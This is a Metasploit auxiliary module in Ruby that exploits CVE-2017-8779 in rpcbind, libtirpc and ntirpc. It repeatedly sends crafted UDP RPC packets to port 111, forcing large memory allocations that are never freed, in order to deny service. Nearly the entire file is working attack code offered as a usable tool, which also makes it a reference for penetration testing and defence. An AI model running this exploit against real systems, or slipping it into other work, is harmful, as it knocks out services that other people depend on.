modules/auxiliary/dos/rpc/rpcbomb.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
def initialize(info={})
super(update_info(info,
'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
'Description' => %q{
This module exploits a vulnerability in certain versions of
rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
large (and never freed) memory allocations for XDR strings on
the target.
},
'Author' =>
[
'guidovranken', # original code
'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2017-8779' ],
[ 'BID', '98325' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
],
'Disclosure Date' => 'May 03 2017'))
register_options([
Opt::RPORT(111),
OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
])
end
def scan_host(ip)
pkt = [
0, # xid
0, # message type CALL
2, # RPC version 2
100000, # Program
4, # Program version
9, # Procedure
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Program: 0
0, # Ver
4, # Proc
4, # Argument length
datastore['ALLOCSIZE'] # Payload
].pack('N*')
s = udp_socket(ip, datastore['RPORT'])
count = 0
while count < datastore['COUNT'] do
begin
s.send(pkt, 0)
rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
vprint_error("Host #{ip} unreachable")
break
end
count += 1
end
vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
end
end